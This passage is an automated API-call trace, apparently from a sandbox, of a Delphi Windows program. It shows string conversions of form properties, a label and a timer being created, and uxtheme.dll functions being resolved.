lpWideCharStr=0x0) returned 11 [0281.607] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x63515c0, cbMultiByte=11, lpWideCharStr=0x635fea8, cchWideChar=11 | out: lpWideCharStr="ClientWidtht") returned 11 [0281.607] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ClientWidth", cchWideChar=11, lpMultiByteStr=0x637c454, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ClientWidtht", lpUsedDefaultChar=0x0) returned 11 [0281.607] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x63515c0, cbMultiByte=5, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5 [0281.607] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x63515c0, cbMultiByte=5, lpWideCharStr=0x63515d8, cchWideChar=5 | out: lpWideCharStr="Color") returned 5 [0281.607] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Color", cchWideChar=5, lpMultiByteStr=0x634a19c, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Color", lpUsedDefaultChar=0x0) returned 5 [0281.607] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x63515c0, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0281.607] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x63515c0, cbMultiByte=9, lpWideCharStr=0x634a198, cchWideChar=9 | out: lpWideCharStr="clBtnFace") returned 9 [0281.607] GetCurrentThreadId () returned 0x62c [0281.607] GetCurrentThreadId () returned 0x62c [0281.608] GetCurrentThreadId () returned 0x62c [0281.608] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x63515c0, cbMultiByte=12, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 12 [0281.608] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x63515c0, cbMultiByte=12, lpWideCharStr=0x635fea8, cchWideChar=12 | out: lpWideCharStr="Font.Charseth") returned 12 [0281.608] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Font", cchWideChar=4, lpMultiByteStr=0x634a13c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Fontl", lpUsedDefaultChar=0x0) returned 4 [0281.608] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Charset", cchWideChar=7, lpMultiByteStr=0x635feac, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Charset", lpUsedDefaultChar=0x0) returned 7 [0281.608] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x634a158, cbMultiByte=15, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 15 [0281.608] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x634a158, cbMultiByte=15, lpWideCharStr=0x6366c68, cchWideChar=15 | out: lpWideCharStr="DEFAULT_CHARSET") returned 15 [0281.608] GetCurrentThreadId () returned 0x62c [0281.608] GetCurrentThreadId () returned 0x62c [0281.608] GetCurrentThreadId () returned 0x62c [0281.608] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x63515c0, cbMultiByte=10, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0281.608] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x63515c0, cbMultiByte=10, lpWideCharStr=0x634a158, cchWideChar=10 | out: lpWideCharStr="Font.Color馰ش\x18") returned 10 [0281.608] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Font", cchWideChar=4, lpMultiByteStr=0x634a13c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Fonta", lpUsedDefaultChar=0x0) returned 4 [0281.608] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Color", cchWideChar=5, lpMultiByteStr=0x634a15c, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Color", lpUsedDefaultChar=0x0) returned 5 [0281.608] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x63515c0, cbMultiByte=12, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 12 [0281.608] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x63515c0, cbMultiByte=12, lpWideCharStr=0x635fed0, cchWideChar=12 | out: lpWideCharStr="clWindowTexth") returned 12 [0281.608] GetCurrentThreadId () returned 0x62c [0281.608] GetCurrentThreadId () returned 0x62c [0281.608] GetCurrentThreadId () returned 0x62c [0281.608] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x63515c0, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0281.608] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x63515c0, cbMultiByte=11, lpWideCharStr=0x635fea8, cchWideChar=11 | out: lpWideCharStr="Font.Heightr") returned 11 [0281.608] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Font", cchWideChar=4, lpMultiByteStr=0x634a13c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Fontl", lpUsedDefaultChar=0x0) returned 4 [0281.608] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Height", cchWideChar=6, lpMultiByteStr=0x635feac, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HeightH", lpUsedDefaultChar=0x0) returned 6 [0281.608] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x63515c0, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0281.608] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x63515c0, cbMultiByte=9, lpWideCharStr=0x634a158, cchWideChar=9 | out: lpWideCharStr="Font.Name") returned 9 [0281.608] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Font", cchWideChar=4, lpMultiByteStr=0x634a13c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Fonti", lpUsedDefaultChar=0x0) returned 4 [0281.608] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Name", cchWideChar=4, lpMultiByteStr=0x634a15c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Namen", lpUsedDefaultChar=0x0) returned 4 [0281.609] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x63515c0, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0281.609] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x63515c0, cbMultiByte=6, lpWideCharStr=0x63515d8, cchWideChar=6 | out: lpWideCharStr="Tahoma") returned 6 [0281.609] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Tahoma", cchWideChar=6, lpMultiByteStr=0x534f479, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Tahoma", lpUsedDefaultChar=0x0) returned 6 [0281.609] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x63515c0, cbMultiByte=10, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0281.609] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x63515c0, cbMultiByte=10, lpWideCharStr=0x634a158, cchWideChar=10 | out: lpWideCharStr="Font.Style馰ش\x18") returned 10 [0281.609] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Font", cchWideChar=4, lpMultiByteStr=0x634a13c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Fontm", lpUsedDefaultChar=0x0) returned 4 [0281.609] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Style", cchWideChar=5, lpMultiByteStr=0x634a15c, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Style", lpUsedDefaultChar=0x0) returned 5 [0281.609] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x0, cbMultiByte=0, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 0 [0281.609] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x0, cbMultiByte=0, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 0 [0281.609] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x634a158, cbMultiByte=14, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0281.609] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x634a158, cbMultiByte=14, lpWideCharStr=0x635fed0, cchWideChar=14 | out: lpWideCharStr="OldCreateOrder") returned 14 [0281.609] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OldCreateOrder", cchWideChar=14, lpMultiByteStr=0x6391e7c, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OldCreateOrder", lpUsedDefaultChar=0x0) returned 14 [0281.609] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="False", cchWideChar=5, lpMultiByteStr=0x634a15c, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FalseOrdery", lpUsedDefaultChar=0x0) returned 5 [0281.609] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x63515c0, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0281.609] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x63515c0, cbMultiByte=8, lpWideCharStr=0x634a138, cchWideChar=8 | out: lpWideCharStr="Position") returned 8 [0281.609] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Position", cchWideChar=8, lpMultiByteStr=0x6366ccc, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Positionr", lpUsedDefaultChar=0x0) returned 8 [0281.609] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x63515c0, cbMultiByte=10, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0281.610] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x63515c0, cbMultiByte=10, lpWideCharStr=0x634a138, cchWideChar=10 | out: lpWideCharStr="poDesignedꆑش\xfde9\x01") returned 10 [0281.610] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="poDesigned", cchWideChar=10, lpMultiByteStr=0x6366ccc, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="poDesignede", lpUsedDefaultChar=0x0) returned 10 [0281.610] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x63515c0, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0281.610] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x63515c0, cbMultiByte=8, lpWideCharStr=0x634a138, cchWideChar=8 | out: lpWideCharStr="OnCreateedꆑش\xfde9\x01") returned 8 [0281.610] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OnCreate", cchWideChar=8, lpMultiByteStr=0x6366ccc, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OnCreateed", lpUsedDefaultChar=0x0) returned 8 [0281.610] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x63515c0, cbMultiByte=10, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0281.610] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x63515c0, cbMultiByte=10, lpWideCharStr=0x634a138, cchWideChar=10 | out: lpWideCharStr="FormCreateꆑش\xfde9\x01") returned 10 [0281.610] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FormCreate", cchWideChar=10, lpMultiByteStr=0x534f585, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FormCreate\x06\n", lpUsedDefaultChar=0x0) returned 10 [0281.610] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x634a138, cbMultiByte=13, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 13 [0281.610] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x634a138, cbMultiByte=13, lpWideCharStr=0x635fed0, cchWideChar=13 | out: lpWideCharStr="PixelsPerInchrصҰ\x02\x01") returned 13 [0281.610] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PixelsPerInch", cchWideChar=13, lpMultiByteStr=0x637c454, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PixelsPerInch", lpUsedDefaultChar=0x0) returned 13 [0281.610] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x63515c0, cbMultiByte=10, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0281.610] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x63515c0, cbMultiByte=10, lpWideCharStr=0x634a138, cchWideChar=10 | out: lpWideCharStr="TextHeightꆑش\xfde9\x01") returned 10 [0281.610] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TextHeight", cchWideChar=10, lpMultiByteStr=0x6366c9c, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TextHeights", lpUsedDefaultChar=0x0) returned 10 [0281.610] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x63515c0, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0281.610] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x63515c0, cbMultiByte=6, lpWideCharStr=0x63515d8, cchWideChar=6 | out: lpWideCharStr="TLabel") returned 6 [0281.610] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x63515c0, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0281.610] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x63515c0, cbMultiByte=6, lpWideCharStr=0x63515d8, cchWideChar=6 | out: lpWideCharStr="Label1") returned 6 [0281.610] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x60d99c5, cbMultiByte=6, lpWideCharStr=0x634a19c, cchWideChar=7 | out: lpWideCharStr="TTimer") returned 6 [0281.610] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="TTimer", cchCount1=6, lpString2="TLabel", cchCount2=6) returned 3 [0281.610] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x60c4767, cbMultiByte=6, lpWideCharStr=0x634a19c, cchWideChar=7 | out: lpWideCharStr="TLabel") returned 6 [0281.610] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="TLabel", cchCount1=6, lpString2="TLabel", cchCount2=6) returned 2 [0281.610] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x534f559, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="¡4\x06\x07", lpUsedDefaultChar=0x0) returned 0 [0281.611] GetCurrentThreadId () returned 0x62c [0281.611] GetCurrentThreadId () returned 0x62c [0281.611] GetCurrentThreadId () returned 0x62c [0281.611] LoadLibraryW (lpLibFileName="uxtheme.dll") returned 0x74b10000 [0281.612] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="OpenThemeData", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0281.612] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="OpenThemeData", cchWideChar=13, lpMultiByteStr=0x634a1dc, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OpenThemeData", lpUsedDefaultChar=0x0) returned 13 [0281.612] GetProcAddress (hModule=0x74b10000, lpProcName="OpenThemeData") returned 0x74b173d2 [0281.612] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CloseThemeData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0281.612] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CloseThemeData", cchWideChar=14, lpMultiByteStr=0x634a1dc, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseThemeData", lpUsedDefaultChar=0x0) returned 14 [0281.612] GetProcAddress (hModule=0x74b10000, lpProcName="CloseThemeData") returned 0x74b16a18 [0281.612] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="DrawThemeBackground", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0281.613] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="DrawThemeBackground", cchWideChar=19, lpMultiByteStr=0x635ff9c, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DrawThemeBackground", lpUsedDefaultChar=0x0) returned 19 [0281.613] GetProcAddress (hModule=0x74b10000, lpProcName="DrawThemeBackground") returned 0x74b13982 [0281.613] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="DrawThemeText", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0281.613] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="DrawThemeText", cchWideChar=13, lpMultiByteStr=0x634a1dc, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DrawThemeText", lpUsedDefaultChar=0x0) returned 13 [0281.613] GetProcAddress (hModule=0x74b10000, lpProcName="DrawThemeText") returned 0x74b14ea1 [0281.613] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeBackgroundContentRect", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0281.613] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeBackgroundContentRect", cchWideChar=29, lpMultiByteStr=0x6366c6c, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetThemeBackgroundContentRect", lpUsedDefaultChar=0x0) returned 29 [0281.614] GetProcAddress (hModule=0x74b10000, lpProcName="GetThemeBackgroundContentRect") returned 0x74b1cd2e [0281.614] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeBackgroundExtent", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0281.614] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeBackgroundExtent", cchWideChar=24, lpMultiByteStr=0x6366c6c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetThemeBackgroundExtent", lpUsedDefaultChar=0x0) returned 24 [0281.614] GetProcAddress (hModule=0x74b10000, lpProcName="GetThemeBackgroundExtent") returned 0x74b1f8bf [0281.614] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemePartSize", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0281.614] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemePartSize", cchWideChar=16, lpMultiByteStr=0x635ff9c, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetThemePartSize", lpUsedDefaultChar=0x0) returned 16 [0281.615] GetProcAddress (hModule=0x74b10000, lpProcName="GetThemePartSize") returned 0x74b1cdb1 [0281.615] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeTextExtent", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0281.615] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeTextExtent", cchWideChar=18, lpMultiByteStr=0x635ff9c, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetThemeTextExtent", lpUsedDefaultChar=0x0) returned 18 [0281.615] GetProcAddress (hModule=0x74b10000, lpProcName="GetThemeTextExtent") returned 0x74b12d57 [0281.615] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeTextMetrics", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0281.615] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeTextMetrics", cchWideChar=19, lpMultiByteStr=0x635ff9c, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetThemeTextMetrics", lpUsedDefaultChar=0x0) returned 19 [0281.616] GetProcAddress (hModule=0x74b10000, lpProcName="GetThemeTextMetrics") returned 0x74b1f992 [0281.616] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeBackgroundRegion", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0281.616] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeBackgroundRegion", cchWideChar=24, lpMultiByteStr=0x6366c6c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetThemeBackgroundRegion", lpUsedDefaultChar=0x0) returned 24 [0281.616] GetProcAddress (hModule=0x74b10000, lpProcName="GetThemeBackgroundRegion") returned 0x74b2165d [0281.616] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="HitTestThemeBackground", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0281.616] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="HitTestThemeBackground", cchWideChar=22, lpMultiByteStr=0x635ff9c, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HitTestThemeBackground", lpUsedDefaultChar=0x0) returned 22 [0281.616] GetProcAddress (hModule=0x74b10000, lpProcName="HitTestThemeBackground") returned 0x74b23ce3 [0281.617] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="DrawThemeEdge", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0281.617] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="DrawThemeEdge", cchWideChar=13, lpMultiByteStr=0x634a1dc, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DrawThemeEdge", lpUsedDefaultChar=0x0) returned 13 [0281.617] GetProcAddress (hModule=0x74b10000, lpProcName="DrawThemeEdge") returned 0x74b33b52 [0281.617] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="DrawThemeIcon", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0281.617] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="DrawThemeIcon", cchWideChar=13, lpMultiByteStr=0x634a1dc, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DrawThemeIcon", lpUsedDefaultChar=0x0) returned 13 [0281.617] GetProcAddress (hModule=0x74b10000, lpProcName="DrawThemeIcon") returned 0x74b435e7 [0281.617] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="IsThemePartDefined", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0281.617] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="IsThemePartDefined", cchWideChar=18, lpMultiByteStr=0x635ff9c, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IsThemePartDefined", lpUsedDefaultChar=0x0) returned 18 [0281.618] GetProcAddress (hModule=0x74b10000, lpProcName="IsThemePartDefined") returned 0x74b185b4 [0281.618] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="IsThemeBackgroundPartiallyTransparent", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0281.618] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="IsThemeBackgroundPartiallyTransparent", cchWideChar=37, lpMultiByteStr=0x637c454, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IsThemeBackgroundPartiallyTransparent", lpUsedDefaultChar=0x0) returned 37 [0281.618] GetProcAddress (hModule=0x74b10000, lpProcName="IsThemeBackgroundPartiallyTransparent") returned 0x74b160ab [0281.618] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeColor", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0281.618] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeColor", cchWideChar=13, lpMultiByteStr=0x634a1dc, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetThemeColor", lpUsedDefaultChar=0x0) returned 13 [0281.619] 